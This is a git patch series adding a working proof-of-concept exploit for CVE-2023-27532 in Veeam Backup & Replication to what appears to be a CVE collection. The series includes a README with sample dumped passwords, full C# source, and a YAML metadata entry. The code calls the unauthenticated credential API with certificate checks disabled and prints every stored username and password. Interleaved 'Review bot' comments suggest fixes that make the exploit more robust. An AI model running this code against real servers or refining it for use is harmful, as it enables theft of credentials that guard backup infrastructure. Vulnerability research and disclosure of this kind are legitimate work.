From 7a69987535bc6d497ba2c993397a412d33d64be5 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:54:47 +0000 Subject: [PATCH 1/8] add cve/Veeam/2023/CVE-2023-27532/README.md. Signed-off-by: dalianpanzi --- cve/Veeam/2023/CVE-2023-27532/README.md | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/README.md diff --git a/cve/Veeam/2023/CVE-2023-27532/README.md b/cve/Veeam/2023/CVE-2023-27532/README.md new file mode 100644 index 00000000..58c4533a --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/README.md 
@@ -0,0 +1,31 @@ +# CVE-2023-27532 +POC for CVE-2023-27532 affecting Veeam Backup and Replication + +## Technical Analysis +A technical root cause analysis of the vulnerability can be found on our blog: +https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive + +## Summary +This POC abuses an unsecured API endpoint to extract credentials. + +## Usage +```plaintext +/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/ +UserName = dev Password = Super Secret Password +UserName = root Password = +UserName = root Password = +UserName = root Password = +UserName = root Password = +``` + +## Mitigations +Update to the latest version or mitigate by following the instructions within the Veeam Advisory +* https://www.veeam.com/kb4424 + +## Follow the Horizon3.ai Attack Team on Twitter for the latest security research: +* [Horizon3 Attack Team](https://twitter.com/Horizon3Attack) +* [James Horseman](https://twitter.com/JamesHorseman2) +* [Zach Hanley](https://twitter.com/hacks_zach) + +## Disclaimer +This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. -- Gitee From 4d143326747a5d1a58b04676c253c9120ba60228 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:55:31 +0000 Subject: [PATCH 2/8] add cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln. Signed-off-by: dalianpanzi --- .../2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln 
diff --git a/cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln b/cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln new file mode 100644 index 00000000..cc235c5f --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/Veeam_CVE-2023-27532.sln @@ -0,0 +1,16 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2023-27532", "CVE-2023-27532\CVE-2023-27532.csproj", "{0B4F72A8-5A34-4D8C-B588-44D11A3A8576}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Debug|Any CPU.Build.0 = Debug|Any CPU + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Release|Any CPU.ActiveCfg = Release|Any CPU + {0B4F72A8-5A34-4D8C-B588-44D11A3A8576}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection +EndGlobal \ No newline at end of file -- Gitee From f129594cf6ac0d2973d9c694ab5781fbb0659245 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:56:20 +0000 Subject: [PATCH 3/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs. Signed-off-by: dalianpanzi --- .../CVE-2023-27532/BinaryProxy.cs | 78 +++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs new file mode 100644 index 00000000..26bd33b7 --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/BinaryProxy.cs 
@@ -0,0 +1,78 @@ +using System.Runtime.Serialization; + +//https://stackoverflow.com/questions/13594831/binaryformatter-is-it-possible-to-deserialize-known-class-without-the-assembly +namespace CVE_2023_27532; + +class ProxyTestClass +{ + private Dictionary data = new Dictionary(); + + public Object GetData(string name) + { + if (data.ContainsKey(name)) + { + return data[name]; + } + + return null; + } + + public void SetData(string name, object value) + { + data[name] = value; + } + + public IEnumerable> Dump() + { + return data; + } +} + +class SurrogateTestClassConstructor : ISerializationSurrogate +{ + private ProxyTestClass mProxy; + + /// + /// Populates the provided with the data needed to serialize the object. + /// + /// The object to serialize. + /// The to populate with data. + /// The destination (see ) for this serialization. + /// The caller does not have the required permission. + public void GetObjectData(object obj, SerializationInfo info, StreamingContext context) + { + throw new NotImplementedException(); + } + + /// + /// Populates the object using the information in the . + /// + /// + /// The populated deserialized object. + /// + /// The object to populate. + /// The information to populate the object. + /// The source from which the object is deserialized. + /// The surrogate selector where the search for a compatible surrogate begins. + /// The caller does not have the required permission. + public object SetObjectData(object obj, SerializationInfo info, StreamingContext context, + ISurrogateSelector selector) + { + if (mProxy == null) mProxy = new ProxyTestClass(); + var en = info.GetEnumerator(); + while (en.MoveNext()) + { + mProxy.SetData(en.Current.Name, en.Current.Value); + } + + return mProxy; + } +} + +sealed class DeserializeBinder : SerializationBinder +{ + public override Type BindToType(string assemblyName, string typeName) + { + return typeof(ProxyTestClass); + } +} \ No newline at end of file -- Gitee 
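Review bot: `SetObjectData` caches one `ProxyTestClass` in `mProxy` and hands the same instance back on every call, while `DeserializeBinder.BindToType` maps every incoming type name to `ProxyTestClass`, so a payload holding more than one bound object (nested members included) gets all of their fields merged into one dictionary, with same-named entries overwriting each other. Build a fresh instance per call and drop the field: `var proxy = new ProxyTestClass();` … `proxy.SetData(en.Current.Name, en.Current.Value);` … `return proxy;`. `GetData` does a double lookup; `return data.TryGetValue(name, out var value) ? value : null;` is the idiomatic form (the dictionary's type arguments appear to have been lost in this rendering, so I have not assumed them). `GetObjectData` is deliberately unsupported because this surrogate only ever deserializes, so `throw new NotSupportedException("deserialization-only surrogate");` states that more honestly than `NotImplementedException`.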
From b7abd4db040d7b9f1046662aacc44a805287fea4 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:56:43 +0000 Subject: [PATCH 4/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj. Signed-off-by: dalianpanzi --- .../CVE-2023-27532/CVE-2023-27532.csproj | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj new file mode 100644 index 00000000..270c2911 --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/CVE-2023-27532.csproj @@ -0,0 +1,16 @@ + + + + Exe + net6.0 + CVE_2023_27532 + enable + enable + + + + + + + + \ No newline at end of file -- Gitee From 98d5bd8b47b65e9e820685e6409ed8021aa09b69 Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:57:12 +0000 Subject: [PATCH 5/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs. Signed-off-by: dalianpanzi --- .../CVE-2023-27532/CVE-2023-27532/Program.cs | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs new file mode 100644 index 00000000..bb9992cd --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/Program.cs 
@@ -0,0 +1,116 @@ +using System.Runtime.Serialization; +using System.Runtime.Serialization.Formatters.Binary; +using System.ServiceModel; +using System.ServiceModel.Security; +using System.Text; +using System.Text.RegularExpressions; +using System.Xml; + +namespace CVE_2023_27532; + +class Program +{ + static List GetCredGuids(IRemoteInvokeService proxy) + { + MemoryStream memoryStream = new MemoryStream(); + BinaryFormatter binaryFormatter = new BinaryFormatter(); +#pragma warning disable SYSLIB0011 + binaryFormatter.Serialize(memoryStream, true); +#pragma warning restore SYSLIB0011 + string base64 = Convert.ToBase64String(memoryStream.ToArray()); + + var xml = "" + + "\n" + + "\n" + + $"\n" + + "\n" + + ""; + + var response = proxy.Invoke(ERemoteInvokeScope.DatabaseManager, + ERemoteInvokeMethod.CredentialsDbScopeGetAllCreds, + xml); + + XmlDocument doc = new XmlDocument(); + doc.LoadXml(response); + XmlNodeList paramNodes = doc.GetElementsByTagName("Param"); + String paramValue = paramNodes[0].Attributes["ParamValue"].Value; + byte[] decoded = Convert.FromBase64String(paramValue); + String str = Encoding.UTF8.GetString(decoded); + Regex regex = new Regex(@"\$(\w{8}-\w{4}-\w{4}-\w{4}-\w{12})"); + MatchCollection matches = regex.Matches(str); + List guids = new List(); + + foreach (Match match in matches) { + string guidString = match.Groups[1].Value; + guids.Add(guidString); + } + + return guids; + } + + static void GetCred(String guid, IRemoteInvokeService proxy) + { + MemoryStream memoryStream = new MemoryStream(); + BinaryFormatter binaryFormatter = new BinaryFormatter(); +#pragma warning disable SYSLIB0011 + binaryFormatter.Serialize(memoryStream, new Guid(guid)); +#pragma warning restore SYSLIB0011 + string base64 = Convert.ToBase64String(memoryStream.ToArray()); + + var xml = "" + + "\n" + + "\n" + + $"\n" + + "\n" + + ""; + + var response = proxy.Invoke(ERemoteInvokeScope.DatabaseManager, + ERemoteInvokeMethod.CredentialsDbScopeFindCredentials, + xml); + + 
XmlDocument doc = new XmlDocument(); + doc.LoadXml(response); + XmlNodeList paramNodes = doc.GetElementsByTagName("Param"); + String paramValue = paramNodes[0].Attributes["ParamValue"].Value; + byte[] decoded = Convert.FromBase64String(paramValue); + + //https://stackoverflow.com/questions/13594831/binaryformatter-is-it-possible-to-deserialize-known-class-without-the-assembly + var surrSel = new SurrogateSelector(); + surrSel.AddSurrogate(typeof(ProxyTestClass), new StreamingContext(StreamingContextStates.All), new + SurrogateTestClassConstructor()); + BinaryFormatter formatter = new BinaryFormatter(); + formatter.Binder = new DeserializeBinder(); + formatter.SurrogateSelector = surrSel; + + var deserializeObj = formatter.Deserialize(new MemoryStream(decoded)) as ProxyTestClass; + foreach (var c in deserializeObj.Dump()) + { + if (c.Key == "UserName" || c.Key == "Password") + { + Console.Write("{0} = {1} ", c.Key, c.Value); + } + } + Console.WriteLine(); + } + + static void Main(string[] args) + { + var address = args[0]; + var binding = new NetTcpBinding(SecurityMode.Transport); + binding.Security.Transport.ClientCredentialType = TcpClientCredentialType.None; + var dnsIdentity = new DnsEndpointIdentity("Veeam Backup Server Certificate"); + var endpointAddress = new EndpointAddress(new Uri(address), dnsIdentity); + + ChannelFactory factory = + new ChannelFactory(binding, endpointAddress); + factory.Credentials.ServiceCertificate.Authentication.CertificateValidationMode = + X509CertificateValidationMode.None; + + IRemoteInvokeService proxy = factory.CreateChannel(); + var guids = GetCredGuids(proxy); + foreach (var guid in guids) + { + GetCred(guid, proxy); + } + } +} \ No newline at end of file -- Gitee From 8aa38b04c84de020d8f91190ce1bf973ecb12a6d Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 07:57:42 +0000 Subject: [PATCH 6/8] add cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs. 
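Review bot: `GetCred` passes bytes returned by the remote endpoint straight to `BinaryFormatter.Deserialize`, the API .NET marks obsolete as SYSLIB0011 because it is unsafe on input the caller does not control; the custom binder narrows the target type, but this call is not even wrapped in the same `#pragma warning disable SYSLIB0011` used around the two `Serialize` calls, so the build warns inconsistently, and a comment such as `// Deserializes server-controlled bytes; the binder restricts the type but BinaryFormatter stays unsafe on untrusted data` should sit above it. Both `GetCredGuids` and `GetCred` index `paramNodes[0]` and `.Attributes["ParamValue"]` unchecked, so a reply without a `Param` element (an error response, or a server that rejects the call) dies with a NullReferenceException instead of a message; add `if (paramNodes.Count == 0) throw new InvalidOperationException("response contains no Param element");` before the indexing, and test `deserializeObj` for null before calling `Dump()` since `as` returns null on a type mismatch. `Main` reads `args[0]` without checking `args.Length` and never closes the `ChannelFactory` or the channel it creates; call `factory.Close()` in a `finally` (or a `using` declaration) so the connection is released on every exit path.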
Signed-off-by: dalianpanzi --- .../CVE-2023-27532/RemoteInvokeInterface.cs | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs diff --git a/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs new file mode 100644 index 00000000..82378739 --- /dev/null +++ b/cve/Veeam/2023/CVE-2023-27532/CVE-2023-27532/RemoteInvokeInterface.cs @@ -0,0 +1,24 @@ +using System.Runtime.Serialization; +using System.ServiceModel; + +namespace CVE_2023_27532; + +[DataContract(Name = "InvokeScope")] +public enum ERemoteInvokeScope +{ + [EnumMember] DatabaseManager, +} + +[DataContract(Name = "InvokeMethod")] +public enum ERemoteInvokeMethod +{ + [EnumMember] CredentialsDbScopeFindCredentials, + [EnumMember] CredentialsDbScopeGetAllCreds, +} + +[ServiceContract(Name = "IRemoteInvokeService")] +public interface IRemoteInvokeService +{ + [OperationContract] + string Invoke(ERemoteInvokeScope scope, ERemoteInvokeMethod method, string parameters); +} \ No newline at end of file -- Gitee From 2b82215cafebf03903279bb86bc99c5fbd1b9bdc Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 08:03:18 +0000 Subject: [PATCH 7/8] add cve/Veeam/2023/yaml/CVE-2023-27532.yaml. Signed-off-by: dalianpanzi --- cve/Veeam/2023/yaml/CVE-2023-27532.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cve/Veeam/2023/yaml/CVE-2023-27532.yaml diff --git a/cve/Veeam/2023/yaml/CVE-2023-27532.yaml b/cve/Veeam/2023/yaml/CVE-2023-27532.yaml new file mode 100644 index 00000000..b5eb9edc --- /dev/null +++ b/cve/Veeam/2023/yaml/CVE-2023-27532.yaml 
@@ -0,0 +1,18 @@ +id: CVE-2023-27532 +source: https://github.com/horizon3ai/CVE-2023-27532 +info: + name: Veeam Backup&Replication是一套专门为VMware vSphere和Microsoft Hyper-V虚拟环境开发的备份方案,主要是在数据保护和灾难恢复方面提供了一整套的功能。 + severity: HIGH + description: Veeam备份和复制组件中的漏洞允许获取存储在配置数据库中的加密凭据。这可能会导致获得对备份基础结构主机的访问权限。 + scope-of-influence: + Veeam Backup & Replication + reference: + - https://nvd.nist.gov/vuln/detail/cve-2023-27532 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-27532 + cwe-id: CWE-306 + cnvd-id: None + kve-id: None + tags: Veeam Backup & Replication, 数据库 \ No newline at end of file -- Gitee From 6b0c22f3312c15a5a96a826e3d08a9a71eb9a32b Mon Sep 17 00:00:00 2001 From: dalianpanzi Date: Fri, 7 Apr 2023 08:06:41 +0000 Subject: [PATCH 8/8] update openkylin_list.yaml. Signed-off-by: dalianpanzi --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a6..4f486a3e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -164,6 +164,8 @@ cve: - CVE-2021-43798 Froxlor: - CVE-2023-0315 + Veeam: + - CVE-2023-27532 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee